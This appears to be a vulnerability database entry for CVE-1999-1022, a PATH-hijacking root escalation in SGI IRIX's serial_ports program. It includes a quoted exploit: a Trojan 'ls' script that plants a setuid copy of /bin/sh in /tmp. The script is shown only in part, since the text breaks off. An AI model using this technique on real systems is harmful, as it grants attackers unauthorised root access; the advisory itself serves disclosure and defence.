CVE-1999-1022

Published: 02/10/1994 Updated: 19/12/2017
CVSS v2 Base Score: 6.2 | Impact Score: 10 | Exploitability Score: 1.9
VMScore: 625
Vector: AV:L/AC:H/Au:N/C:C/I:C/A:C

Vulnerability Summary

serial_ports administrative program in IRIX 4.x and 5.x trusts the user's PATH environmental variable to find and execute the ls program, which allows local users to gain root privileges via a Trojan horse ls program.

Vulnerable Product

sgi irix 5.3

sgi irix 4

sgi irix 5.2

Exploits

source: www.securityfocus.com/bid/464/info

A race condition exists in the serial_ports administrative program, as included by SGI in the 5.x Irix operating system. This race condition allows regular users to execute arbitrary commands as root.

cat > /tmp/ls
#!/bin/sh
cp /bin/sh /tmp/foo
chmod 4777 /tmp/foo
^D
chmod 755 /tmp/ls
cd /tmp
...